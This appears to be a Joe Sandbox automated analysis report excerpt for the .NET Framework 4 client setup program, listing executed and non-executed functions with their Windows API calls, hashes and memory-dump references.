                                                                                                                                                                    • Opcode ID: 4e0f99df234387fc56a37e9c03511f21bb2bd87ec07f48e57e185c2dc494504a
                                                                                                                                                                    • Instruction ID: 6dcf1719caaac43d3cd392a0c637f10355aa6db950057f79e93dbbe2b44d00bf
                                                                                                                                                                    • Opcode Fuzzy Hash: 4e0f99df234387fc56a37e9c03511f21bb2bd87ec07f48e57e185c2dc494504a
                                                                                                                                                                    • Instruction Fuzzy Hash: AEF03430500A15AFCBB1EFA9DA81C66B7F8AB047507148839E99AC7601E720FD40CB60
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00025222 Relevance: 1.5, APIs: 1, Instructions: 27COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 00025229
                                                                                                                                                                      • Part of subcall function 00024F70: __EH_prolog3.LIBCMT ref: 00024F77
                                                                                                                                                                      • Part of subcall function 00028054: __EH_prolog3.LIBCMT ref: 0002805B
                                                                                                                                                                      • Part of subcall function 00028054: WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,00025279,?,?,?,00000000,00028585,?,00000000,?,?,000000CC,00020145), ref: 0002808E
                                                                                                                                                                      • Part of subcall function 00025293: __EH_prolog3.LIBCMT ref: 0002529A
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3$ObjectSingleWait
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3802047751-0
                                                                                                                                                                    • Opcode ID: 611100690c9cdf2345b1a9a1fa1974e92a424a0e1b3fb0b1277ce0ecd0668a89
                                                                                                                                                                    • Instruction ID: e8187aa49fcb8673efe1d91d0077697a08ca2370c48aa90a9d7a42eccf4d910a
                                                                                                                                                                    • Opcode Fuzzy Hash: 611100690c9cdf2345b1a9a1fa1974e92a424a0e1b3fb0b1277ce0ecd0668a89
                                                                                                                                                                    • Instruction Fuzzy Hash: 3DF0B430401669EED702E7F4D505BCDBBA86F21304F148098E19963183CB782708C772
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00020B42 Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • __EH_prolog3.LIBCMT ref: 00020B49
                                                                                                                                                                      • Part of subcall function 00024F70: __EH_prolog3.LIBCMT ref: 00024F77
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                                                    • Opcode ID: 2c9d2e3fdc6742e010abb90a94fd1173ecf52767fe3d899e6f5d57cd6efab46a
                                                                                                                                                                    • Instruction ID: 265c7083b51dd1e10894aba4cf508694a4c50f20e613b0d5878b29cb73e331de
                                                                                                                                                                    • Opcode Fuzzy Hash: 2c9d2e3fdc6742e010abb90a94fd1173ecf52767fe3d899e6f5d57cd6efab46a
                                                                                                                                                                    • Instruction Fuzzy Hash: 11F08270500654EFDB11EFA4D405BCEBBB8BF51358F104158E5159B2A3C735AB44CB91
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0002501D Relevance: 1.5, APIs: 1, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                                                    • Opcode ID: 4308c6ee847d7d4aa329d2a82b10e64d61e40bcf856d2a33e1b9c4b67f14d7a2
                                                                                                                                                                    • Instruction ID: 3f388fc5e716d6dfc7976e1da949080e8e9fe3f4dcb5af2eb59d8d1e652121ab
                                                                                                                                                                    • Opcode Fuzzy Hash: 4308c6ee847d7d4aa329d2a82b10e64d61e40bcf856d2a33e1b9c4b67f14d7a2
                                                                                                                                                                    • Instruction Fuzzy Hash: F6E01234600B10DBDB22AF54D81678D7A72BB54737F104508E4956F2E2C7781940C651
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000250C4 Relevance: 1.5, APIs: 1, Instructions: 15COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 431132790-0
                                                                                                                                                                    • Opcode ID: 8208959b16bc6e758b1c3d856998d976b931e1094c2f54cdaf4bdd6da11f8e6c
                                                                                                                                                                    • Instruction ID: 00231595e71ecccd176e113baf10e5e966d5de89ae7bb600183b7b7e2592f9a7
                                                                                                                                                                    • Opcode Fuzzy Hash: 8208959b16bc6e758b1c3d856998d976b931e1094c2f54cdaf4bdd6da11f8e6c
                                                                                                                                                                    • Instruction Fuzzy Hash: 42E01234600B10DBDB22AF54D81678D7B72BB54777F108108E4956F2D2C7781940CA51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000169B0 Relevance: 1.5, APIs: 1, Instructions: 14windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SendMessageA.USER32(00000405,00000000,00000000,00016381), ref: 000169D5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: MessageSend
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3850602802-0
                                                                                                                                                                    • Opcode ID: 447f421b0cabf046ca79d6e3fe37496fd397a09bb0ca90f08e2dd03b312f651f
                                                                                                                                                                    • Instruction ID: f05fb923c56a49e62d09df6cb02845e2679241ee1f4a47e278ec369b4f588f6b
                                                                                                                                                                    • Opcode Fuzzy Hash: 447f421b0cabf046ca79d6e3fe37496fd397a09bb0ca90f08e2dd03b312f651f
                                                                                                                                                                    • Instruction Fuzzy Hash: 08D0CAB0200112EFFB620B20AC488B632ECAB6A746B814839E600E4060F27E48D9AB50
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000234C4 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3_catch
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3886170330-0
                                                                                                                                                                    • Opcode ID: a59269079ec3c8d799754d35487596c234f0c507aa2d2b688a054ac576a9801f
                                                                                                                                                                    • Instruction ID: 2d32cf1eb97141ff716eb56ccc0e21d3df13abb9cee0ea6b58c9d110f801c296
                                                                                                                                                                    • Opcode Fuzzy Hash: a59269079ec3c8d799754d35487596c234f0c507aa2d2b688a054ac576a9801f
                                                                                                                                                                    • Instruction Fuzzy Hash: 6ED06736100118FBDF13AF90DD02FDD3A66BF58345F108115BA0828062C77A9A70AB55
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000218BD Relevance: 1.5, APIs: 1, Instructions: 8COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: H_prolog3_catch
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 3886170330-0
                                                                                                                                                                    • Opcode ID: c6b3ed0bc27ff43915e94fb55df061efb600f79f1898814ffb53b4f76e5e5581
                                                                                                                                                                    • Instruction ID: 1cba093fe1395be09a29ec45fbacad8cd797baec468478d5272573dd9ee2af4f
                                                                                                                                                                    • Opcode Fuzzy Hash: c6b3ed0bc27ff43915e94fb55df061efb600f79f1898814ffb53b4f76e5e5581
                                                                                                                                                                    • Instruction Fuzzy Hash: 53B092B8A48224A3DA42F7F0E0463DC1118AB20303FA04040A204190C3C9BA1A085223
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00027FD7 Relevance: 1.3, APIs: 1, Instructions: 55COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00027E46: CreateEventA.KERNEL32(00000000,?,00000000,00000000), ref: 00027E5B
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0002803E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorEventLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 545576003-0
                                                                                                                                                                    • Opcode ID: 79c11816141e6f9d1f06b4f6a61c77aa3e0210883c27453269a82c7bb4b6b351
                                                                                                                                                                    • Instruction ID: a4379d1090a4fcfadad6212e3025e31c2702189242c3944a2268b218d6e4f68a
                                                                                                                                                                    • Opcode Fuzzy Hash: 79c11816141e6f9d1f06b4f6a61c77aa3e0210883c27453269a82c7bb4b6b351
                                                                                                                                                                    • Instruction Fuzzy Hash: 1501A7F9509225AED7B0BA60ACC5CBB76DCDF54348340883DF24AC2402EB74ED488731
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00018417 Relevance: 1.3, APIs: 1, Instructions: 37COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00019CA3: CreateFileW.KERNELBASE(?,?,?,00000000,00015AE3,?,00000000,?,00000000,?,?,?,0001843A,?,40000000,00000005), ref: 00019CD2
                                                                                                                                                                    • GetLastError.KERNEL32(?,40000000,00000005,00000002,00000080,00000000,00000000,?,00015AE3,X?f), ref: 00018444
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CreateErrorFileLast
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1214770103-0
                                                                                                                                                                    • Opcode ID: 67dc170764428b945cec8702e808750640390782c4ecfc7e488a11c345770a7d
                                                                                                                                                                    • Instruction ID: 24b1165492f0853600d0887b0a790625ab1952f7e35ab0b58d0944d2566a3f12
                                                                                                                                                                    • Opcode Fuzzy Hash: 67dc170764428b945cec8702e808750640390782c4ecfc7e488a11c345770a7d
                                                                                                                                                                    • Instruction Fuzzy Hash: 5DF0B432D4192567E33217A9AC05BDABA989F427B0F16C231FF00FB292DF659E8057D0
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 000192BB Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 213fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetFileAttributesW.KERNEL32(00000000,?,00000000,00000000,X?f), ref: 0001930C
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00019319
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080), ref: 00019354
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0001935A
                                                                                                                                                                    • FindFirstFileW.KERNEL32(00000000,?,\*.*,00000000,00000000), ref: 000193CC
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 000193DD
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000080,?,00000000,00000000), ref: 000194C3
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 000194C9
                                                                                                                                                                    • DeleteFileW.KERNEL32(00000000,?,00000000,00000000), ref: 000194E7
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 000194F1
                                                                                                                                                                    • FindNextFileW.KERNEL32(000000FF,?,?,00000000,00000000), ref: 00019516
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00019524
                                                                                                                                                                    • FindClose.KERNEL32(000000FF,?,00000000,00000000,X?f), ref: 00019556
                                                                                                                                                                    • RemoveDirectoryW.KERNEL32(00000000,?,00000000,00000000,X?f), ref: 0001957A
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00019584
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$File$AttributesFind$CloseDeleteDirectoryFirstNextRemove
                                                                                                                                                                    • String ID: X?f$\*.*
                                                                                                                                                                    • API String ID: 2447602905-865809652
                                                                                                                                                                    • Opcode ID: af253c263a7297f208ab9444133ef18944d1a8226032ae4abd29f87a615b6870
                                                                                                                                                                    • Instruction ID: 4156cf44efc91ea50d583104ae5dd4f7a6574f320e64e961334be378685ab2bc
                                                                                                                                                                    • Opcode Fuzzy Hash: af253c263a7297f208ab9444133ef18944d1a8226032ae4abd29f87a615b6870
                                                                                                                                                                    • Instruction Fuzzy Hash: 7871B232C01A3A9BEB725B64CC687EDBAA1AF04760F0542B0ED15F7191E7758EC0DB90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001A7B1 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • FindFirstFileW.KERNEL32(?,?,*.*,00000000,?,?,00000000,00000000), ref: 0001A842
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0001A853
                                                                                                                                                                    • FindNextFileW.KERNEL32(?,00000010), ref: 0001A904
                                                                                                                                                                    • CloseHandle.KERNEL32(000000FF), ref: 0001A954
                                                                                                                                                                    • FindClose.KERNEL32(000000FF), ref: 0001A969
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Find$CloseFile$ErrorFirstHandleLastNext
                                                                                                                                                                    • String ID: *.*
                                                                                                                                                                    • API String ID: 3695076719-438819550
                                                                                                                                                                    • Opcode ID: 6c2ca0630db409db24240e320cfd064c94b1700b7c305665d8f473678728a195
                                                                                                                                                                    • Instruction ID: 36e921461aad887e6d1753f05b5043eb0a6a7c143cee8d156f573729b4366e3c
                                                                                                                                                                    • Opcode Fuzzy Hash: 6c2ca0630db409db24240e320cfd064c94b1700b7c305665d8f473678728a195
                                                                                                                                                                    • Instruction Fuzzy Hash: 15518131E0262A9FCB31AF64CC886D9B7B4AF05324F2143E5E559A7161EB319EC5CF41
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 0001B4B3 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 17libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadLibraryW.KERNEL32(kernel32.dll,?,0001B503), ref: 0001B4C2
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0001B4D9
                                                                                                                                                                    • GetProcAddress.KERNEL32(DecodePointer), ref: 0001B4EB
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$LibraryLoad
                                                                                                                                                                    • String ID: DecodePointer$EncodePointer$kernel32.dll
                                                                                                                                                                    • API String ID: 2238633743-1525541703
                                                                                                                                                                    • Opcode ID: f609c9e27c7fef1a67992c3d0e445ee665f9eca74ba830075a6b62c269268965
                                                                                                                                                                    • Instruction ID: 8b2bdc3f831fd1f2cd344211a4460366d01705a8f4662257b35a5067cc8861d8
                                                                                                                                                                    • Opcode Fuzzy Hash: f609c9e27c7fef1a67992c3d0e445ee665f9eca74ba830075a6b62c269268965
                                                                                                                                                                    • Instruction Fuzzy Hash: E4E0B671880298EAF7429B65BC58BD53BA8A78A725F004016A608EA262C7B814C49B80
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 00028FF5 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 14libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetVersion.KERNEL32 ref: 00028FF5
                                                                                                                                                                    • GetModuleHandleW.KERNEL32(KERNEL32.DLL), ref: 00029004
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 00029010
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProcVersion
                                                                                                                                                                    • String ID: KERNEL32.DLL$SetProcessDEPPolicy
                                                                                                                                                                    • API String ID: 3310240892-1809394400
                                                                                                                                                                    • Opcode ID: 48941e0c87ebebd7b4b5a32135a8eed12cb12a2d728f1aab685e49e38b035617
                                                                                                                                                                    • Instruction ID: cb6d543f48cecdcc7f85ed035cee5598a266c91ef9471f5a2447a3ea22f07b7e
                                                                                                                                                                    • Opcode Fuzzy Hash: 48941e0c87ebebd7b4b5a32135a8eed12cb12a2d728f1aab685e49e38b035617
                                                                                                                                                                    • Instruction Fuzzy Hash: F4D01230B4424DAFEB595BB06C4DBD926566B4C741F404414F30ED5095DEE482D19515
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 000291D5 Relevance: 7.6, APIs: 5, Instructions: 58COMMONLIBRARYCODE
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • IsDebuggerPresent.KERNEL32 ref: 0002AE0F
                                                                                                                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0002AE24
                                                                                                                                                                    • UnhandledExceptionFilter.KERNEL32(00011E14), ref: 0002AE2F
                                                                                                                                                                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0002AE4B
                                                                                                                                                                    • TerminateProcess.KERNEL32(00000000), ref: 0002AE52
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000002.00000002.4193526051.0000000000011000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                    • Associated: 00000002.00000002.4193445911.0000000000010000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193688952.000000000003D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    • Associated: 00000002.00000002.4193886804.000000000003E000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_2_2_10000_dotNetFx40_Client_setup.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2579439406-0
